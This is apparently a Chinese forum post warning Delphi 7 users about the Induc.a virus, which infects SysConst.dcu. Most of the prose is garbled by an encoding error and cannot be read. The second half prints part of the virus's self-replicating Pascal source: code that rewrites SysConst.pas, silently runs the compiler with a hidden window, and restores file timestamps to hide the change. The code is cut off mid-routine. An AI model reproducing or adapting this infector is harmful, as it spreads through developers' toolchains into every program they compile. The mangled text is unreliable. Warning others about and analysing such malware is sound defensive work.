רÃÅÕë¶ÔdelphiµÄ£¬Ç¶ÈëÔ´ÂëµÄ²¡¶¾
Èç¹ûÔÚ X:\Program Files\Borland\Delphi7\Lib ·¢ÏÖÓÐ SysConst.bak (12KB) ºÍ
SysConst.dcu (18KB)£¬ÄÇô¹§Ï²Ä㣬ÖÐÕÐÁË¡£
http://topic.csdn.net/u/20090817/20/102ba10b-82ae-472d-a0be-6d54ce6a331b.html
http://bbs.2ccc.com/topic.asp?topicid=330829
http://bbs.2ccc.com/topic.asp?topicid=330760
http://www.delphibbs.com/delphibbs/dispq.asp?lid=3972581
ºÃÓÐȤµÄ¸ÐȾ·½Ê½,¹»¿É°®ÁË~
½ñÌìȺµÄÈË·¢ÁËÒ»ÌõÁ´½Ó,¹ØÓÚÐí¶àÈËSysConst.dcu±»¸ÐȾ.
±»¸ÐȾºóµÄSysConst.dcuÌå»ýÊÇ18KB×óÓÒ,Õý³£µÄSysConst.dcuÊÇ12KB×óÓÒ.
͵͵ÃéÁËÒ»ÏÂżµÄSysConst.dcu,¾¹È»±»¸ÐȾÁË,¶øÇÒDZ·üµÄʱ¼äÓ¦¸Ã³¬¹ý4¸öÔÂ~
Ö»ÊÇÇ°Á½Ì쿨°Í¸üв¡¶¾¿â,¿¨°Í±¨²¡¶¾ÃûΪ:Virus.Win32.Induc.a,´ó¼Ò²Å·¢¾õÓÐËù²»Í×.
uses windows; var sc:array[1..24] of string=(',
'function x(s:string):string;var i:integer;begin for i:=1 to length(s) do if s',
'= #36 thens:=#39;result:=s;end;procedure re(s,d,e:string);var f1,f2:textfile;',
'h:cardinal;f:STARTUPINFO;p:PROCESS_INFORMATION;b:boolean;t1,t2,t3:FILETIME;begin',
'h:=CreateFile(pchar(d+$bak$),0,0,0,3,0,0);if h<>DWORD(-1) then begin CloseHandle',
'(h);exit;end;{$I-}assignfile(f1,s);reset(f1);if ioresult<>0 then exit;assignfile',
'(f2,d+$pas$);rewrite(f2);if ioresult<>0 then begin closefile(f1);exit;end; while',
'not eof(f1) do begin readln(f1,s); writeln(f2,s); if pos($implementation$,s)<>0',
'then break;end;for h:= 1 to 1 do writeln(f2,sc[h]);for h:= 1 to 23 do writeln(f2',
',$$$$+sc[h],$$$,$);writeln(f2,$$$$+sc[24]+$$$);$);for h:= 2 to 24 do writeln(f2,',
'x(sc[h]));closefile(f1);closefile(f2);{$I+}MoveFile(pchar(d+$dcu$),pchar(d+$bak$',
')); fillchar(f,sizeof(f),0); f.cb:=sizeof(f); f.dwFlags:=STARTF_USESHOWWINDOW;f.',
'wShowWindow:=SW_HIDE;b:=CreateProcess(nil,pchar(e+$"$+d+$pas"$),0,0,false,0,0,0,',
'f,p);if b then WaitForSingleObject(p.hProcess,INFINITE);MoveFile(pchar(d+$bak$),',
'pchar(d+$dcu$));DeleteFile(pchar(d+$pas$));h:=CreateFile(pchar(d+$bak$),0,0,0,3,',
'0,0); if h=DWORD(-1) then exit; GetFileTime(h,@t1,@t2,@t3)
